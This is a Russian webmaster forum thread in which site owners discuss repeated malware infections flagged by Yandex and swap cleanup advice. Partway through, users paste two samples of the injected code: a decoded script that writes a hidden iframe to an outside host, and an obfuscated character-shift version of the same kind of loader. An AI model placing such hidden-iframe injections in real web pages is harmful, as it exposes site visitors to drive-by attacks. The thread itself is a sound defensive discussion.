- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Привет всем. Не знаю куда писать куда обращаться,кого просить и так далее..... Яндекс просто не дает работать сайту постояно находит вредоносный код на сайте. Не знаю даже с чего начать но запоследнии полтора месяца раза 3 на сайте у меня находил этот код . первый раз он как говориться был действительно в низу шаблона нашол убрал ++ еще кое где в файлах фтп. проработал сайт месяц обратно яндекс нашол КОД . Стояла рекламка покера убрал все стало на свои места. Сайт вообще пустой без рекламмы без не чего все уже негде как говориться просочиться ..менял пароли и ФТП и в Админ панеле после всего. Вобщем проработал еще сейт недели 3 и тут еще хуже попадаю уже всем известно на Хосте МАКхост. Сайт вообще не работал 2 дня. вчера включили сайт в 12 дня все супер думал пережили и это ..Но через час меня посто обрубило посещалка пошла как говориться но Опять Яндекс нашол этот код ..В Яндексе вебмастере он мне указал весть мой сайт siropik.ru . Вобщем последнее что вчера убрал это МИНИ ЧАТ . Не знаю что и делать и где его искать .Комп чист без вирусов. Вообщем нет сил надеюсь на хороших специалистов в окозании помощи..жалко сайт бросать хоть и молодой он. Моя аська 599-846-925. Может кто то подскажет кому можно обраться конкретно с этой проблемой?
Проверь INDEX.* файлы на непонятные *.js файлы.
не храни пароли в FTP менеджере.
Проверь все index'ы и файлы с расширением htm, html.
Если МАКхост (не знаю) позволяет поставь ограничение доступа по ip.
Комп точно без вирусов, то ?
стукните в асю
Это глюк...на 2х сайтах висящих на Петерхосте постоянно находил....утро начиналось с письм а от Я
Потом отпустило, виров не было..все проверяли.
ftp смените пароли...может трой висит..
Он хитрый...на 1 час может редирект повесить..потом снять и не подкапаться.
Наверное Trojan.Script.Iframer мучает вас, тоже не знаю как с ним бороться. Заливаю дорвеи через фтпзиллу и через мин 10-15 появляется код на индексовых страницах. Комп чистил касперским, , постяно обновляю базы, пароли в фтп не храню (только во время соединения и заливки)...хз что делать
Также с этой сукой (Trojan.Script.Iframer) воюю.
Архив с файлами и базу сгрузил с сервака и проверил на локалке. Код вируса дописался в 2 java-скрипта. Пришлось вернуть в исходное состояние и сменить пароли к фтп (хотя никогда их не храню в менеджерах закачки)...
Код вируса расшифровал...
вот расшифрованный:
if (document.cookie.search("0=7")==-1)
{
document.write("<iframe src=http://apoplus.com/phpGEDview/xmlrpc.php style=display:none></iframe>");
document.cookie="0=7; expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
Что делает вроде-бы понятно...
Спасибо большое ВСЕМ за помощь !!! Вредоносный код был в папке enigme JS . Гуггл вебмастер указал точный адрес !!!! А яндекс только показывал весь сайт siropik.ru/ Так что благодаря гуглу я сразу нашол этот код. Спасибо всем за понимание и рекомендации . Ваши коменты скопирую в текстовой файл чтоб сразу знать где в первую очередь проверять☝
sirop245 добавил 10.04.2010 в 10:14
Вот такой код удалил a=0;while(a<100)document.write(String.fromCharCode('=jgsbnf!tsd>#iuuq;00npcjmtfsw3111/jogp07770joefy/qiq#!xjeui>#1#!ifjhiu>#1#!gsbnfcpsefs>#1#?=0jgsbnf?'.charCodeAt(a++)-1));
Не кто не знает что это???🚬
у меня тоже зилла, только код появлялся в файлах main.tpl, index
зилла чудит?